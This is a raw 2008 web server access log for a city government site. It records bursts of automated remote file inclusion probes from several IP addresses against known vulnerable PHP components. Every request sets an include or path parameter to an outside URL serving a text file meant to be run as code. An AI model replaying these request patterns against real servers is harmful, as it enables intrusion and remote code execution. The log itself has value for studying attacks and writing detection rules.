74.53.231.2 - - [31/Aug/2008:21:53:39 -0700] "GET /administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_http://chuckysplace.com/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "cityofarkadelphia.com"
63.208.74.34 - - [31/Aug/2008:21:54:36 -0700] "GET /logs/access_080201.log/modules/My_eGallery/index.php?basepath=http://chuckysplace.com/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
63.208.74.34 - - [31/Aug/2008:21:54:36 -0700] "GET /modules/My_eGallery/index.php?basepath=http://chuckysplace.com/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
63.208.74.34 - - [31/Aug/2008:21:54:36 -0700] "GET /logs/modules/My_eGallery/index.php?basepath=http://chuckysplace.com/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
203.199.149.72 - - [31/Aug/2008:21:58:40 -0700] "GET /logs/access_080401.log%20//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.fileden.com/files/2008/6/19/1967132/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "cityofarkadelphia.com"
203.199.149.72 - - [31/Aug/2008:21:59:03 -0700] "GET /logs/access.log%20//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.fileden.com/files/2008/6/19/1967132/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "cityofarkadelphia.com"
216.246.28.43 - - [31/Aug/2008:22:00:15 -0700] "GET /logs/access_080331.log/htmltonuke.php?filnavn=http://indocairo.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "cityofarkadelphia.com"
216.246.28.43 - - [31/Aug/2008:22:00:16 -0700] "GET /htmltonuke.php?filnavn=http://indocairo.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "cityofarkadelphia.com"
216.246.28.43 - - [31/Aug/2008:22:00:16 -0700] "GET /logs/htmltonuke.php?filnavn=http://indocairo.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "cityofarkadelphia.com"
216.246.28.43 - - [31/Aug/2008:22:00:39 -0700] "GET /logs/access_080331.log/htmltonuke.php?filnavn=http://indocairo.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "cityofarkadelphia.com"
216.246.28.43 - - [31/Aug/2008:22:00:40 -0700] "GET /htmltonuke.php?filnavn=http://indocairo.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "cityofarkadelphia.com"
216.246.28.43 - - [31/Aug/2008:22:00:41 -0700] "GET /logs/htmltonuke.php?filnavn=http://indocairo.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "cityofarkadelphia.com"
216.246.28.43 - - [31/Aug/2008:22:00:49 -0700] "GET /logs/access_080331.log/htmltonuke.php?filnavn=http://indocairo.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "cityofarkadelphia.com"
216.246.28.43 - - [31/Aug/2008:22:00:49 -0700] "GET /htmltonuke.php?filnavn=http://indocairo.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "cityofarkadelphia.com"
216.246.28.43 - - [31/Aug/2008:22:00:50 -0700] "GET /logs/htmltonuke.php?filnavn=http://indocairo.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "cityofarkadelphia.com"
72.9.233.10 - - [31/Aug/2008:22:01:28 -0700] "GET /logs/access_080331.log/htmltonuke.php?filnavn=http://indocairo.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "cityofarkadelphia.com"
72.9.233.10 - - [31/Aug/2008:22:01:28 -0700] "GET /htmltonuke.php?filnavn=http://indocairo.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "cityofarkadelphia.com"
72.9.233.10 - - [31/Aug/2008:22:01:28 -0700] "GET /logs/htmltonuke.php?filnavn=http://indocairo.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "cityofarkadelphia.com"
72.9.233.10 - - [31/Aug/2008:22:01:32 -0700] "GET /logs/access_080331.log/htmltonuke.php?filnavn=http://indocairo.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "cityofarkadelphia.com"
72.9.233.10 - - [31/Aug/2008:22:01:32 -0700] "GET /htmltonuke.php?filnavn=http://indocairo.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "cityofarkadelphia.com"
72.9.233.10 - - [31/Aug/2008:22:01:32 -0700] "GET /logs/htmltonuke.php?filnavn=http://indocairo.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "cityofarkadelphia.com"
216.246.28.43 - - [31/Aug/2008:22:01:37 -0700] "GET /logs/access.log///vwar/backup/errors.php?error=http://indocairo.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "cityofarkadelphia.com"
216.246.28.43 - - [31/Aug/2008:22:01:37 -0700] "GET ///vwar/backup/errors.php?error=http://indocairo.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "cityofarkadelphia.com"
216.246.28.43 - - [31/Aug/2008:22:01:38 -0700] "GET /logs/access.log///vwar/backup/errors.php?error=http://indocairo.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "cityofarkadelphia.com"
216.246.28.43 - - [31/Aug/2008:22:01:38 -0700] "GET /logs///vwar/backup/errors.php?error=http://indocairo.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "cityofarkadelphia.com"
216.246.28.43 - - [31/Aug/2008:22:01:38 -0700] "GET /logs/access.log///vwar/backup/errors.php?error=http://indocairo.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "cityofarkadelphia.com"
216.246.28.43 - - [31/Aug/2008:22:01:38 -0700] "GET ///vwar/backup/errors.php?error=http://indocairo.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "cityofarkadelphia.com"
216.246.28.43 - - [31/Aug/2008:22:01:38 -0700] "GET ///vwar/backup/errors.php?error=http://indocairo.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "cityofarkadelphia.com"
216.246.28.43 - - [31/Aug/2008:22:01:38 -0700] "GET /logs///vwar/backup/errors.php?error=http://indocairo.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "cityofarkadelphia.com"
216.246.28.43 - - [31/Aug/2008:22:01:39 -0700] "GET /logs///vwar/backup/errors.php?error=http://indocairo.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "cityofarkadelphia.com"
72.9.233.10 - - [31/Aug/2008:22:02:04 -0700] "GET /logs/access.log///vwar/backup/errors.php?error=http://indocairo.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "cityofarkadelphia.com"
72.9.233.10 - - [31/Aug/2008:22:02:04 -0700] "GET ///vwar/backup/errors.php?error=http://indocairo.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "cityofarkadelphia.com"
72.9.233.10 - - [31/Aug/2008:22:02:04 -0700] "GET /logs///vwar/backup/errors.php?error=http://indocairo.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "cityofarkadelphia.com"
216.246.28.43 - - [31/Aug/2008:22:02:10 -0700] "GET /logs/access.log///vwar/backup/errors.php?error=http://indocairo.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "cityofarkadelphia.com"
216.246.28.43 - - [31/Aug/2008:22:02:10 -0700] "GET ///vwar/backup/errors.php?error=http://indocairo.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "cityofarkadelphia.com"
216.246.28.43 - - [31/Aug/2008:22:02:11 -0700] "GET /logs///vwar/backup/errors.php?error=http://indocairo.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "cityofarkadelphia.com"
200.25.180.198 - - [31/Aug/2008:22:06:23 -0700] "GET //components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.fileden.com/files/2008/6/19/1967132/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
200.25.180.198 - - [31/Aug/2008:22:06:23 -0700] "GET /logs//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.fileden.com/files/2008/6/19/1967132/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
200.25.180.198 - - [31/Aug/2008:22:06:23 -0700] "GET /logs/access.log//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.fileden.com/files/2008/6/19/1967132/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
72.9.233.10 - - [31/Aug/2008:22:06:35 -0700] "GET /logs/access_080331.log/htmltonuke.php?filnavn=http://indocairo.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "cityofarkadelphia.com"
72.9.233.10 - - [31/Aug/2008:22:06:36 -0700] "GET /htmltonuke.php?filnavn=http://indocairo.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "cityofarkadelphia.com"
72.9.233.10 - - [31/Aug/2008:22:06:36 -0700] "GET /logs/htmltonuke.php?filnavn=http://indocairo.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "cityofarkadelphia.com"
72.9.233.10 - - [31/Aug/2008:22:06:40 -0700] "GET /logs/access_080331.log/htmltonuke.php?filnavn=http://indocairo.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "cityofarkadelphia.com"
72.9.233.10 - - [31/Aug/2008:22:06:40 -0700] "GET /htmltonuke.php?filnavn=http://indocairo.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "cityofarkadelphia.com"
72.9.233.10 - - [31/Aug/2008:22:06:40 -0700] "GET /logs/htmltonuke.php?filnavn=http://indocairo.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "cityofarkadelphia.com"
72.9.233.10 - - [31/Aug/2008:22:08:45 -0700] "GET /logs/access_080701.log/htmltonuke.php?filnavn=http://indocairo.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "cityofarkadelphia.com"
72.9.233.10 - - [31/Aug/2008:22:08:45 -0700] "GET /logs/access_080701.log/htmltonuke.php?filnavn=http://indocairo.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "cityofarkadelphia.com"
203.199.149.72 - - [31/Aug/2008:22:10:43 -0700] "GET /logs//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.fileden.com/files/2008/6/19/1967132/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "cityofarkadelphia.com"
203.199.149.72 - - [31/Aug/2008:22:10:45 -0700] "GET //components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.fileden.com/files/2008/6/19/1967132/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "cityofarkadelphia.com"
203.199.149.72 - - [31/Aug/2008:22:10:45 -0700] "GET /logs/access_080329.log//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.fileden.com/files/2008/6/19/1967132/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "cityofarkadelphia.com"
203.199.149.72 - - [31/Aug/2008:22:10:48 -0700] "GET /logs/access.log//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.fileden.com/files/2008/6/19/1967132/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "cityofarkadelphia.com"
77.221.130.3 - - [31/Aug/2008:22:10:49 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://websnap.ru//wp-content/uploads/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "cityofarkadelphia.com"
200.25.180.198 - - [31/Aug/2008:22:10:54 -0700] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://www.fileden.com/files/2008/6/19/1967132/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
200.25.180.198 - - [31/Aug/2008:22:10:54 -0700] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://www.fileden.com/files/2008/6/19/1967132/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
200.25.180.198 - - [31/Aug/2008:22:10:57 -0700] "GET /logs/access_071231.log/components/com_performs/performs.php?mosConfig_absolute_path=http://www.fileden.com/files/2008/6/19/1967132/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
216.246.28.43 - - [31/Aug/2008:22:12:01 -0700] "GET /logs/access.log///vwar/backup/errors.php?error=http://indocairo.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "cityofarkadelphia.com"
216.246.28.43 - - [31/Aug/2008:22:12:02 -0700] "GET ///vwar/backup/errors.php?error=http://indocairo.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "cityofarkadelphia.com"
216.246.28.43 - - [31/Aug/2008:22:12:02 -0700] "GET /logs///vwar/backup/errors.php?error=http://indocairo.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "cityofarkadelphia.com"
216.246.28.43 - - [31/Aug/2008:22:12:18 -0700] "GET /logs/access.log///vwar/backup/errors.php?error=http://indocairo.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "cityofarkadelphia.com"
216.246.28.43 - - [31/Aug/2008:22:12:18 -0700] "GET ///vwar/backup/errors.php?error=http://indocairo.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "cityofarkadelphia.com"
216.246.28.43 - - [31/Aug/2008:22:12:19 -0700] "GET /logs///vwar/backup/errors.php?error=http://indocairo.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "cityofarkadelphia.com"
216.246.28.43 - - [31/Aug/2008:22:12:35 -0700] "GET /logs/access.log///vwar/backup/errors.php?error=http://indocairo.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "cityofarkadelphia.com"
216.246.28.43 - - [31/Aug/2008:22:12:35 -0700] "GET ///vwar/backup/errors.php?error=http://indocairo.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "cityofarkadelphia.com"
216.246.28.43 - - [31/Aug/2008:22:12:35 -0700] "GET /logs///vwar/backup/errors.php?error=http://indocairo.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "cityofarkadelphia.com"
200.25.180.198 - - [31/Aug/2008:22:13:06 -0700] "GET /logs/access_080330.log//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.fileden.com/files/2008/6/19/1967132/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
216.246.28.43 - - [31/Aug/2008:22:13:17 -0700] "GET /logs/access.log///vwar/backup/errors.php?error=http://indocairo.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "cityofarkadelphia.com"
216.246.28.43 - - [31/Aug/2008:22:13:18 -0700] "GET ///vwar/backup/errors.php?error=http://indocairo.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "cityofarkadelphia.com"
216.246.28.43 - - [31/Aug/2008:22:13:19 -0700] "GET /logs///vwar/backup/errors.php?error=http://indocairo.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "cityofarkadelphia.com"
211.239.162.41 - - [31/Aug/2008:22:18:09 -0700] "GET /logs/vwar/g4//convert/mvcw.php?step=1&vwar_root=http://sunshineruby.com/han/Favorites/%B9C%C0%B8/Games/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "cityofarkadelphia.com"
211.239.162.41 - - [31/Aug/2008:22:18:09 -0700] "GET /logs/access.log/vwar/g4//convert/mvcw.php?step=1&vwar_root=http://sunshineruby.com/han/Favorites/%B9C%C0%B8/Games/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "cityofarkadelphia.com"
211.239.162.41 - - [31/Aug/2008:22:18:09 -0700] "GET /vwar/g4//convert/mvcw.php?step=1&vwar_root=http://sunshineruby.com/han/Favorites/%B9C%C0%B8/Games/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "cityofarkadelphia.com"
89.186.1.54 - - [31/Aug/2008:22:18:11 -0700] "GET /logs/access.log/vwar/g4//convert/mvcw.php?step=1&vwar_root=http://ploplop123.x10hosting.com/rfi/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "cityofarkadelphia.com"
89.186.1.54 - - [31/Aug/2008:22:18:11 -0700] "GET /vwar/g4//convert/mvcw.php?step=1&vwar_root=http://ploplop123.x10hosting.com/rfi/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "cityofarkadelphia.com"
89.186.1.54 - - [31/Aug/2008:22:18:12 -0700] "GET /logs/vwar/g4//convert/mvcw.php?step=1&vwar_root=http://ploplop123.x10hosting.com/rfi/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "cityofarkadelphia.com"
85.13.230.130 - - [31/Aug/2008:22:18:45 -0700] "GET /logs/access_080330.log//components/com_flyspray/startdown.php?file=http://www.myphotowebsite.com/bateman/photos/3/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
85.13.230.130 - - [31/Aug/2008:22:18:45 -0700] "GET //components/com_flyspray/startdown.php?file=http://www.myphotowebsite.com/bateman/photos/3/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
85.13.230.130 - - [31/Aug/2008:22:18:46 -0700] "GET /logs//components/com_flyspray/startdown.php?file=http://www.myphotowebsite.com/bateman/photos/3/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
85.13.230.130 - - [31/Aug/2008:22:19:26 -0700] "GET /logs/access.log//components/com_flyspray/startdown.php?file=http://www.myphotowebsite.com/bateman/photos/3/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
193.110.89.6 - - [31/Aug/2008:22:21:03 -0700] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://sunshineruby.com/han/Favorites/%B9C%C0%B8/Games/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
193.110.89.6 - - [31/Aug/2008:22:21:03 -0700] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://sunshineruby.com/han/Favorites/%B9C%C0%B8/Games/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
193.110.89.6 - - [31/Aug/2008:22:21:03 -0700] "GET /logs/access.log//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://sunshineruby.com/han/Favorites/%B9C%C0%B8/Games/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
72.9.233.10 - - [31/Aug/2008:22:21:56 -0700] "GET /logs/access_080331.log/htmltonuke.php?filnavn=http://indocairo.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "cityofarkadelphia.com"
72.9.233.10 - - [31/Aug/2008:22:21:56 -0700] "GET /htmltonuke.php?filnavn=http://indocairo.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "cityofarkadelphia.com"
72.9.233.10 - - [31/Aug/2008:22:21:56 -0700] "GET /logs/htmltonuke.php?filnavn=http://indocairo.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "cityofarkadelphia.com"
72.9.233.10 - - [31/Aug/2008:22:21:57 -0700] "GET /logs/access_080331.log/htmltonuke.php?filnavn=http://indocairo.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "cityofarkadelphia.com"
72.9.233.10 - - [31/Aug/2008:22:21:57 -0700] "GET /htmltonuke.php?filnavn=http://indocairo.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "cityofarkadelphia.com"
72.9.233.10 - - [31/Aug/2008:22:21:57 -0700] "GET /logs/htmltonuke.php?filnavn=http://indocairo.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "cityofarkadelphia.com"
72.9.233.10 - - [31/Aug/2008:22:22:43 -0700] "GET /logs/access_080701.log/htmltonuke.php?filnavn=http://indocairo.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "cityofarkadelphia.com"
72.9.233.10 - - [31/Aug/2008:22:22:44 -0700] "GET /logs/access_080701.log/htmltonuke.php?filnavn=http://indocairo.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "cityofarkadelphia.com"
85.13.230.130 - - [31/Aug/2008:22:23:05 -0700] "GET /logs/access_080330.log//components/com_flyspray/startdown.php?file=http://www.codeduc.cl/components/id.txt??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
85.13.230.130 - - [31/Aug/2008:22:23:05 -0700] "GET //components/com_flyspray/startdown.php?file=http://www.codeduc.cl/components/id.txt??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
85.13.230.130 - - [31/Aug/2008:22:23:05 -0700] "GET /logs//components/com_flyspray/startdown.php?file=http://www.codeduc.cl/components/id.txt??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
85.13.230.130 - - [31/Aug/2008:22:23:32 -0700] "GET /logs/access.log//components/com_flyspray/startdown.php?file=http://www.codeduc.cl/components/id.txt??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
193.207.106.54 - - [31/Aug/2008:22:24:35 -0700] "GET /index.php?option=com_custompages&cpage=http://www.ganzkoerperpflege.at/files/oye.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
193.207.106.54 - - [31/Aug/2008:22:24:35 -0700] "GET /logs/access_080601.log/index.php?option=com_custompages&cpage=http://www.ganzkoerperpflege.at/files/oye.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
193.207.106.54 - - [31/Aug/2008:22:24:35 -0700] "GET /logs/index.php?option=com_custompages&cpage=http://www.ganzkoerperpflege.at/files/oye.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
193.207.106.54 - - [31/Aug/2008:22:25:03 -0700] "GET /logs/access_080701.log/index.php?option=com_custompages&cpage=http://www.ganzkoerperpflege.at/files/oye.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
85.13.230.130 - - [31/Aug/2008:22:29:26 -0700] "GET //newspublish/include.php?path%5Bdocroot%5D=http://www.myphotowebsite.com/bateman/photos/3/id.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
85.13.230.130 - - [31/Aug/2008:22:29:26 -0700] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://www.myphotowebsite.com/bateman/photos/3/id.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
85.13.230.130 - - [31/Aug/2008:22:29:26 -0700] "GET /logs/access_080201.log//newspublish/include.php?path%5Bdocroot%5D=http://www.myphotowebsite.com/bateman/photos/3/id.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
85.13.230.130 - - [31/Aug/2008:22:30:15 -0700] "GET /logs/access.log//newspublish/include.php?path%5Bdocroot%5D=http://www.myphotowebsite.com/bateman/photos/3/id.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
67.19.216.122 - - [31/Aug/2008:22:30:31 -0700] "GET /logs//errors.php?error=http://www.marioni.info/alb2?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "cityofarkadelphia.com"
67.19.216.122 - - [31/Aug/2008:22:30:31 -0700] "GET //errors.php?error=http://www.marioni.info/alb2?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "cityofarkadelphia.com"
211.239.162.41 - - [31/Aug/2008:22:34:34 -0700] "GET /logs/access_080201.log//skin/zero_vote/ask_password.php?dir=http://sunshineruby.com/han/Favorites/%B9C%C0%B8/Games/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "cityofarkadelphia.com"
211.239.162.41 - - [31/Aug/2008:22:34:35 -0700] "GET /logs//skin/zero_vote/ask_password.php?dir=http://sunshineruby.com/han/Favorites/%B9C%C0%B8/Games/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "cityofarkadelphia.com"
211.239.162.41 - - [31/Aug/2008:22:34:35 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://sunshineruby.com/han/Favorites/%B9C%C0%B8/Games/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "cityofarkadelphia.com"
211.239.162.41 - - [31/Aug/2008:22:34:36 -0700] "GET /logs/access.log//skin/zero_vote/ask_password.php?dir=http://sunshineruby.com/han/Favorites/%B9C%C0%B8/Games/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "cityofarkadelphia.com"
69.64.34.172 - - [31/Aug/2008:22:35:55 -0700] "GET /logs/access.log///vwar/backup/errors.php?error=http://h1.ripway.com/sayankann/bot/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
69.64.34.172 - - [31/Aug/2008:22:35:55 -0700] "GET ///vwar/backup/errors.php?error=http://h1.ripway.com/sayankann/bot/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
69.64.34.172 - - [31/Aug/2008:22:35:55 -0700] "GET /logs///vwar/backup/errors.php?error=http://h1.ripway.com/sayankann/bot/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
85.17.6.7 - - [31/Aug/2008:22:36:51 -0700] "GET /logs/access_080330.log//?path%5Bdocroot%5D=http://albcrew.t35.com/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
85.17.6.7 - - [31/Aug/2008:22:36:51 -0700] "GET //?path%5Bdocroot%5D=http://albcrew.t35.com/pw.txt? HTTP/1.1" 200 917 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
85.17.6.7 - - [31/Aug/2008:22:36:52 -0700] "GET /logs//?path%5Bdocroot%5D=http://albcrew.t35.com/pw.txt? HTTP/1.1" 200 4089 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
85.17.6.7 - - [31/Aug/2008:22:37:43 -0700] "GET /logs/access_071201.log//?path%5Bdocroot%5D=http://albcrew.t35.com/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
85.13.230.130 - - [31/Aug/2008:22:38:50 -0700] "GET /logs/access_080330.log//?path%5Bdocroot%5D=http://www.myphotowebsite.com/bateman/photos/3/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
85.13.230.130 - - [31/Aug/2008:22:38:51 -0700] "GET //?path%5Bdocroot%5D=http://www.myphotowebsite.com/bateman/photos/3/id.txt?? HTTP/1.1" 200 917 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
85.13.230.130 - - [31/Aug/2008:22:38:51 -0700] "GET /logs//?path%5Bdocroot%5D=http://www.myphotowebsite.com/bateman/photos/3/id.txt?? HTTP/1.1" 200 4089 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
66.7.194.82 - - [31/Aug/2008:22:39:04 -0700] "GET /logs/index.php?menu=http://juegos0nline.webcindario.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "cityofarkadelphia.com"
66.7.194.82 - - [31/Aug/2008:22:39:04 -0700] "GET /logs/access.log/index.php?menu=http://juegos0nline.webcindario.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "cityofarkadelphia.com"
66.7.194.82 - - [31/Aug/2008:22:39:04 -0700] "GET /index.php?menu=http://juegos0nline.webcindario.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "cityofarkadelphia.com"
85.13.230.130 - - [31/Aug/2008:22:40:25 -0700] "GET /logs/access_071201.log//?path%5Bdocroot%5D=http://www.myphotowebsite.com/bateman/photos/3/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
